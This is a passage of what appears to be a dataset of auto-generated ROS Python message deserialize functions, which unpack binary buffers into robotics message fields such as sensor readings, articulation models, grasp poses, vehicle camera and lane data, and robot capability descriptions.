_x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.sim_step,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.type.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.type.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.parent_name.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.parent_name.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.name.data = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.wall_time, _x.sim_time, _x.pose.position.x, _x.pose.position.y, _x.pose.position.z, _x.pose.orientation.x, _x.pose.orientation.y, _x.pose.orientation.z, _x.pose.orientation.w, _x.count,) = _get_struct_2f7dI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sB'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.triggered = s.unpack(str[start:end])\n self.triggered = list(map(bool, self.triggered))\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.range = s.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.measurement = s.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.sensed_objects = []\n for i in range(0, length):\n val1 = std_msgs.msg.String()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n val1.data = str[start:end]\n self.sensed_objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n self.sensed_objects_map = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.model is None:\n self.model = articulation_msgs.msg.ModelMsg()\n if self.data is None:\n self.data = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model.header.seq, _x.model.header.stamp.secs, _x.model.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.name = str[start:end].decode('utf-8')\n else:\n self.model.name = str[start:end]\n start = end\n end += 4\n (length,) = 
_struct_I.unpack(str[start:end])\n self.model.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model.track.header.seq, _x.model.track.header.stamp.secs, _x.model.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v15 = val1.position\n _x = _v15\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v16 = val1.orientation\n _x = _v16\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v17 = val1.stamp\n _x = _v17\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v18 = val1.position\n _x = _v18\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v19 = val1.orientation\n _x = _v19\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v20 = val1.position\n _x = _v20\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v21 = val1.orientation\n _x = _v21\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = 
end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.model.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data.header.seq, _x.data.header.stamp.secs, _x.data.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.name = str[start:end].decode('utf-8')\n else:\n self.data.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data.track.header.seq, _x.data.track.header.stamp.secs, _x.data.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v22 = val1.position\n _x = _v22\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v23 = val1.orientation\n _x = _v23\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v24 = val1.stamp\n _x = _v24\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v25 = val1.position\n _x = _v25\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v26 = val1.orientation\n _x = _v26\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_resampled = []\n for i in range(0, length):\n 
val1 = geometry_msgs.msg.Pose()\n _v27 = val1.position\n _x = _v27\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v28 = val1.orientation\n _x = _v28\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data.track.pose_flags = struct.unpack(pattern, str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = struct.unpack(pattern, str[start:end])\n self.data.track.channels.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.position is None:\n self.position = geometry_msgs.msg.Point()\n if self.approach is None:\n self.approach = geometry_msgs.msg.Vector3()\n if self.binormal is None:\n self.binormal = geometry_msgs.msg.Vector3()\n if self.axis is None:\n self.axis = geometry_msgs.msg.Vector3()\n if self.width is None:\n self.width = std_msgs.msg.Float32()\n if self.score is None:\n self.score = std_msgs.msg.Float32()\n if self.sample is None:\n self.sample = geometry_msgs.msg.Point()\n end = 0\n _x = self\n start = end\n end += 128\n (_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z,) = _get_struct_12d2f3d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) # most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 57\n (_x.decision, _x.distance, _x.oriX, _x.oriY, _x.oriZ, _x.placX, _x.placY, _x.placZ,) = _get_struct_b7d().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.localStamp is None:\n self.localStamp = vehicle_msgs.msg.FrameStamp()\n if self.globalStamp is None:\n self.globalStamp = vehicle_msgs.msg.FrameStamp()\n if self.camera is None:\n self.camera = vehicle_msgs.msg.Camera()\n if self.camera_obj is None:\n self.camera_obj = None\n if self.camera_lane is None:\n self.camera_lane = vehicle_msgs.msg.Camera_Lane()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.messageID, _x.localStamp.header.seq, 
_x.localStamp.header.stamp.secs, _x.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.localStamp.time, _x.localStamp.lat, _x.localStamp.lng, _x.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.localStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.globalStamp.header.seq, _x.globalStamp.header.stamp.secs, _x.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.globalStamp.time, _x.globalStamp.lat, _x.globalStamp.lng, _x.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.globalStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.camera.header.seq, _x.camera.header.stamp.secs, _x.camera.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.camera.messageID, _x.camera.localStamp.header.seq, _x.camera.localStamp.header.stamp.secs, _x.camera.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera.localStamp.time, _x.camera.localStamp.lat, _x.camera.localStamp.lng, _x.camera.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.localStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.camera.globalStamp.header.seq, _x.camera.globalStamp.header.stamp.secs, _x.camera.globalStamp.header.stamp.nsecs,) = 
_get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera.globalStamp.time, _x.camera.globalStamp.lat, _x.camera.globalStamp.lng, _x.camera.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera.globalStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.camera.camera_numobstacles, _x.camera.VehSpeed,) = _get_struct_id().unpack(str[start:end])\n self.camera_obj = []\n for i in range(0, 10):\n val1 = vehicle_msgs.msg.Camera_Obj()\n _v9 = val1.header\n start = end\n end += 4\n (_v9.seq,) = _get_struct_I().unpack(str[start:end])\n _v10 = _v9.stamp\n _x = _v10\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v9.frame_id = str[start:end].decode('utf-8')\n else:\n _v9.frame_id = str[start:end]\n start = end\n end += 4\n (val1.messageID,) = _get_struct_i().unpack(str[start:end])\n _v11 = val1.localStamp\n _v12 = _v11.header\n start = end\n end += 4\n (_v12.seq,) = _get_struct_I().unpack(str[start:end])\n _v13 = _v12.stamp\n _x = _v13\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v12.frame_id = str[start:end].decode('utf-8')\n else:\n _v12.frame_id = str[start:end]\n _x = _v11\n start = end\n end += 32\n (_x.time, _x.lat, _x.lng, _x.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n _v11.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v11.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v11.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v11.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _v14 = val1.globalStamp\n _v15 = _v14.header\n start = end\n end += 4\n (_v15.seq,) = _get_struct_I().unpack(str[start:end])\n _v16 = _v15.stamp\n _x = _v16\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _get_struct_2I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v15.frame_id = str[start:end].decode('utf-8')\n else:\n _v15.frame_id = str[start:end]\n _x = _v14\n start = end\n end += 32\n (_x.time, _x.lat, _x.lng, _x.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n _v14.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v14.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v14.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n _v14.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = val1\n start = end\n end += 136\n (_x.camera_obstacle_id, 
_x.camera_obstacleposx, _x.camera_obstacleposy, _x.blinkerInfo, _x.cut_in_and_out, _x.obstacle_type, _x.obstacle_status, _x.obstacle_valid, _x.obstacles_brake_lights, _x.obstacle_length, _x.obstacle_width, _x.obstacles_velx, _x.obstacleAge, _x.obstacleLane, _x.CIPVFlag, _x.RadarPosX, _x.RadarVelX, _x.RadarMatchConfidence, _x.MatcheRadarID, _x.obstacleAngleRate, _x.obstacles_velY, _x.object_Accel_X, _x.obstacleReplaced, _x.obstacleAngle,) = _get_struct_i2d6i3d3i2d2ididid().unpack(str[start:end])\n self.camera_obj.append(val1)\n _x = self\n start = end\n end += 12\n (_x.camera_lane.header.seq, _x.camera_lane.header.stamp.secs, _x.camera_lane.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 16\n (_x.camera_lane.messageID, _x.camera_lane.localStamp.header.seq, _x.camera_lane.localStamp.header.stamp.secs, _x.camera_lane.localStamp.header.stamp.nsecs,) = _get_struct_i3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.localStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.localStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera_lane.localStamp.time, _x.camera_lane.localStamp.lat, _x.camera_lane.localStamp.lng, _x.camera_lane.localStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.localStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 12\n (_x.camera_lane.globalStamp.header.seq, _x.camera_lane.globalStamp.header.stamp.secs, _x.camera_lane.globalStamp.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.camera_lane.globalStamp.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.camera_lane.globalStamp.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 32\n (_x.camera_lane.globalStamp.time, _x.camera_lane.globalStamp.lat, _x.camera_lane.globalStamp.lng, _x.camera_lane.globalStamp.height,) = _get_struct_4d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.position = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.orientation = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.linearSpeed = _get_struct_3d().unpack(str[start:end])\n start = end\n end += 24\n self.camera_lane.globalStamp.angularSpeed = _get_struct_3d().unpack(str[start:end])\n _x = self\n start = end\n end += 404\n (_x.camera_lane.l_numoflaneline, _x.camera_lane.l_lanelineid, _x.camera_lane.l_lanepositon, _x.camera_lane.l_lanecurvature, _x.camera_lane.l_lanecurvaturederivative, _x.camera_lane.l_lane_type, _x.camera_lane.l_heading_angle, _x.camera_lane.l_lane_mark_color, 
_x.camera_lane.l_laneQuality, _x.camera_lane.l_laneWidthMarking, _x.camera_lane.l_laneViewRangStart, _x.camera_lane.l_laneViewRangEnd, _x.camera_lane.l_laneCrossing, _x.camera_lane.l_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.l_lanePRED_OTHER_SIDE, _x.camera_lane.l_lanePRED_OVERRIDE, _x.camera_lane.l_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.l_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.l_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.l_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.l_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.l_lanePRED_SOURCE_STD, _x.camera_lane.l_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.l_laneTCL, _x.camera_lane.r_numoflaneline, _x.camera_lane.r_lanelineid, _x.camera_lane.r_lanepositon, _x.camera_lane.r_lanecurvature, _x.camera_lane.r_lanecurvaturederivative, _x.camera_lane.r_lane_type, _x.camera_lane.r_heading_angle, _x.camera_lane.r_lane_mark_color, _x.camera_lane.r_laneQuality, _x.camera_lane.r_laneWidthMarking, _x.camera_lane.r_laneViewRangStart, _x.camera_lane.r_laneViewRangEnd, _x.camera_lane.r_laneCrossing, _x.camera_lane.r_lanePRED_DIST_BASED_EXTRAPOLATION, _x.camera_lane.r_lanePRED_OTHER_SIDE, _x.camera_lane.r_lanePRED_OVERRIDE, _x.camera_lane.r_lanePRED_OCCLUDED_LM_EXTRAPOLATION, _x.camera_lane.r_lanePRED_HEADWAY_ORIENTED, _x.camera_lane.r_lanePRED_SOURCE_DIVERGING_LANES, _x.camera_lane.r_lanePRED_SOURCE_GUARDRAIL_SHADOW, _x.camera_lane.r_lanePRED_SOURCE_HWE_SPAIN, _x.camera_lane.r_lanePRED_SOURCE_STD, _x.camera_lane.r_lanePRED_SOURCE_VRTL_MERGE, _x.camera_lane.r_laneTCL, _x.camera_lane.next_l_laneViewRangStart, _x.camera_lane.next_l_laneViewRangEnd, _x.camera_lane.next_l_numoflaneline, _x.camera_lane.next_l_lanelineid, _x.camera_lane.next_l_lanepositon, _x.camera_lane.next_l_lanecurvature, _x.camera_lane.next_l_lanecurvaturederivative, _x.camera_lane.next_l_lane_type, _x.camera_lane.next_l_heading_angle, _x.camera_lane.next_l_lane_mark_color, _x.camera_lane.next_l_laneQuality, _x.camera_lane.next_l_laneWidthMarking, _x.camera_lane.next_r_laneViewRangStart, _x.camera_lane.next_r_laneViewRangEnd, _x.camera_lane.next_r_numoflaneline, _x.camera_lane.next_r_lanelineid, _x.camera_lane.next_r_lanepositon, _x.camera_lane.next_r_lanecurvature, _x.camera_lane.next_r_lanecurvaturederivative, _x.camera_lane.next_r_lane_type, _x.camera_lane.next_r_heading_angle, _x.camera_lane.next_r_lane_mark_color, _x.camera_lane.next_r_laneQuality, _x.camera_lane.next_r_laneWidthMarking, _x.camera_lane.highwayConstructionArea, _x.camera_lane.highwayRoadType, _x.camera_lane.highwayHighwayExitRight, _x.camera_lane.highwayHighwayExitLeft, _x.camera_lane.highwayProbabilityLeftLane, _x.camera_lane.highwayProbabilityRightLane, _x.camera_lane.highwayDriving_peed_left_lane, _x.camera_lane.highwayDriving_peed_right_lane, _x.camera_lane.highwayprotocol_version,) = _get_struct_2i3did19i3did21i3did7i3did7i4di().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n end = 0\n _x = self\n start = end\n end += 6\n (_x.sbpl_wait_flag, _x.sbpl_present_x, _x.sbpl_present_y, _x.sbpl_new_x, _x.sbpl_new_y, _x.start_P3DX_motion,) = _struct_B4bB.unpack(str[start:end])\n self.sbpl_wait_flag = bool(self.sbpl_wait_flag)\n self.start_P3DX_motion = bool(self.start_P3DX_motion)\n return self\n except struct.error as e:\n raise roslib.message.DeserializationError(e) #most likely buffer underfill", "def deserialize(self, str):\n try:\n if self.header is None:\n self.header = 
std_msgs.msg.Header()\n if self.vehicle_id is None:\n self.vehicle_id = opil_v2.msg.Id()\n if self.action_capability is None:\n self.action_capability = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.vehicle_id.id,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vehicle_id.description = str[start:end].decode('utf-8')\n else:\n self.vehicle_id.description = str[start:end]\n _x = self\n start = end\n end += 84\n (_x.left_size, _x.right_size, _x.front_size, _x.rear_size, _x.min_height, _x.max_height, _x.payload, _x.max_pos_x_vel, _x.max_neg_x_vel, _x.max_pos_x_acc, _x.max_neg_x_acc, _x.max_pos_y_vel, _x.max_neg_y_vel, _x.max_pos_y_acc, _x.max_neg_y_acc, _x.max_pos_ang_vel, _x.max_neg_ang_vel, _x.velocity_control_sensitivity, _x.min_turning_radius, _x.batt_capacity, _x.batt_max_voltage,) = _get_struct_21f().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vehicle_type = str[start:end].decode('utf-8')\n else:\n self.vehicle_type = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.vendor = str[start:end].decode('utf-8')\n else:\n self.vendor = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.action_capability = []\n for i in range(0, length):\n val1 = opil_v2.msg.RobotAction()\n _x = val1\n start = end\n end += 2\n (_x.category, _x.action,) = _get_struct_2B().unpack(str[start:end])\n start = end\n 